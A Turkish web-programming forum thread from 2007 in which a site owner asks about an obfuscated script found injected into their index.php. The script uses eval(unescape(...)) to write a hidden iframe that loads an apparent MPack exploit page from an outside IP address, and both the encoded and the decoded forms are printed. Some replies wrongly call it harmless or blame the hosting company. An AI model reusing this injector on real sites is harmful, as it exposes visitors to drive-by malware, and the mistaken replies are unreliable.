Ceviz Forum

Geri Dön   Ceviz Forum > Programlama > Javascript / DHTML / Ajax

Cevapla
 
LinkBack Seçenekler
Eski 30/09/2007, 17:32   #1 (permalink)
Ceviz Kıracağı
 
kGlz Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 06/2006
Yer: Kocaeli
Mesaj: 314
Varsayılan izinsiz kod yerleştirme

merhaba arkadaşlar
yapmış olduğum sitede ana sayfaya girdiğimde sadece beyaz bir sayfa ekrana geldi.daha sonra ftp programıyla index.php sayfasını bilgisayarıma indirdim.(daha önce 14kb olan php sayfam şimdi 1.4kb boyutundaydı.kodları açtığımda ise şöyle bir kodla karşşılaştım.

PHP Kodu:
<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script> 
bu kodu arkadaşlar ben yazmadım ve bir korsan tarafından benim siteme atıldı zannedersem.bunun ne olduğu konusunda yardımcı olurmusunz?yani nedir bu. vede bir daha böyle birşeyle karşılaşmamam için ne yapmalıyım.

Teşekkürler.
__________________
http://www.kGlz.com
kGlz hatta değil   Alıntı Yaparak Yanıtla
Eski 30/09/2007, 19:24   #2 (permalink)
Üye
 
selfblood Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 07/2006
Yer: İstanbul
Mesaj: 143
Varsayılan

Sayfaya yazdırılınca şöyle bir kod görünüyor.

Kod:
<iframe src="%5C%22http://81.95.150.82/mpack/index.php%5C%22" style="" height="0" width="0"></iframe>
Sanırım zararlı birşey değil. Adreste de "Apache 2 Test Page" olarak çıkıyor.
__________________
Flickr
selfblood hatta değil   Alıntı Yaparak Yanıtla
Eski 30/09/2007, 22:42   #3 (permalink)
Ceviz Kıracağı
 
kGlz Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 06/2006
Yer: Kocaeli
Mesaj: 314
Varsayılan

Alıntı:
selfblood, mesajından alıntı: Mesajı Gör
Sayfaya yazdırılınca şöyle bir kod görünüyor.

Kod:
<iframe src="%5C%22http://81.95.150.82/mpack/index.php%5C%22" style="" height="0" width="0"></iframe>
Sanırım zararlı birşey değil. Adreste de "Apache 2 Test Page" olarak çıkıyor.
bende avast antivirus var. vede trojen uyarısı veriyo. peki ama bu kodu index.php ye nasıl atıyo.bunu nasıl durdurabilirm.
Kolay gelsin.
__________________
http://www.kGlz.com
kGlz hatta değil   Alıntı Yaparak Yanıtla
Eski 09/10/2007, 17:29   #4 (permalink)
007
 
ProJecT Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 08/2005
Mesaj: 526
Varsayılan

sanırım çalıştığın hosting şirketi bunu yapıyor , yani senin sayfanda zararlı birşeyler tespit ediyorsa karşı tarafından buından zarar görmemesi için bu kodu yazdırıyor . peki birşey sormak istiyorum ? bu index.php yerine index.htm , index.html yada default.asp yada daha değişik dosyalarda yazmışmı ?
ProJecT hatta değil   Alıntı Yaparak Yanıtla
Eski 10/10/2007, 12:46   #5 (permalink)
Ceviz Kıracağı
 
kGlz Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 06/2006
Yer: Kocaeli
Mesaj: 314
Varsayılan

Alıntı:
ProJecT, mesajından alıntı: Mesajı Gör
sanırım çalıştığın hosting şirketi bunu yapıyor , yani senin sayfanda zararlı birşeyler tespit ediyorsa karşı tarafından buından zarar görmemesi için bu kodu yazdırıyor . peki birşey sormak istiyorum ? bu index.php yerine index.htm , index.html yada default.asp yada daha değişik dosyalarda yazmışmı ?
hayır farklı bir dosya falan yazmamıştı.biz index.php yapınca bu kodu onun içine bu kodu atıyodu . biz index.html yapıncada aynı şekilde index.html içine bu kodu atıyodu. Ama sorunun kaynağını çözdük. bizim servere 2 tane kullnıcı ftp hesabıyla girebiliyodu.diğer arkaadşın bilgisayarında virüs varmış.o nedenle diğer arkadaşın bilgisaayrından ftp ye giriş yapınca index.php ye bu kodu o virüs atıyomuş.Arkadaş bilgisayarına format çekti. ve şu an için sorunu çözdük.

Kolay gelsin.
__________________
http://www.kGlz.com
kGlz hatta değil   Alıntı Yaparak Yanıtla
Eski 14/10/2007, 03:42   #6 (permalink)
Üye
 
Üyelik Tarihi: 10/2007
Mesaj: 15
Varsayılan

bu bir internet wormu sanırsam. geçenlerde bir kişinin başına daha gelmişti. hosting firmasından kaynaklanan birşey. google da adresi aradım
http://www.google.com.tr/search?hl=t...btnG=Ara&meta=
yerli yabancı birçok kişi şikayet etmiş ama kesin bir bilgi yok.
mastercollector hatta değil   Alıntı Yaparak Yanıtla
Cevapla

Bookmarks

Seçenekler

Mesaj Yazma Hakları
Yeni mesajgöndermezsiniz
Cevap yazamazsınız
Dosya ekleyemezsiniz
Mesajınızı düzenleyemezsiniz

BB code is Açık
[IMG] kodu Açık
HTML kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu açana göre Forum Cevap En Son Mesaj
adsl'e benden izinsiz.... dream box Ağ / Güvenlik 14 02/01/2008 20:49
KPSS 2006 Yerleştirme Sonucu kamilozcan__ Olumlu Sohbet 4 18/11/2006 14:25
gride edit yerleştirme seyhan_82 C / C++ 0 17/02/2005 23:45
Php : FormMail Img Yerleştirme KaanK PHP 0 06/12/2004 20:26
layer kullanmadan resim yerleştirme.... Gurhan Web Tasarım 1 26/09/2003 22:38


Forum saati Türkiye saatine göredir. GMT +3. Şu anda saat 06:56.

Reklamlar & Desteklenenler
Hassas Valf | Hassas Kaplama | Antalyamız | Gazete | Ticari Bilişim | Hakan Müştak | Rüya Tabirleri | Kadın | Hastalıklar | Cepte msn ve e-posta | Webmaster | Antalya Aupair | Turkish Property Antalya | Forum | Chat | Perde | Adsl | Araba | bolindir.com | guncelle.com | livescore | Web Tasarım | evden eve nakliyat | forum | evden eve | sohbet | Resimcim| Kalifiye İnsan Kaynakları | Web Tasarım | Oyun | Yusuf KOÇ | Akın Yorulmaz | şiir | UFO | Web Tasarım | Oyunlar | Canlı Tv |


Forum Yazılımı: vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0
Copyright ©2001 - 2008, Ceviz.net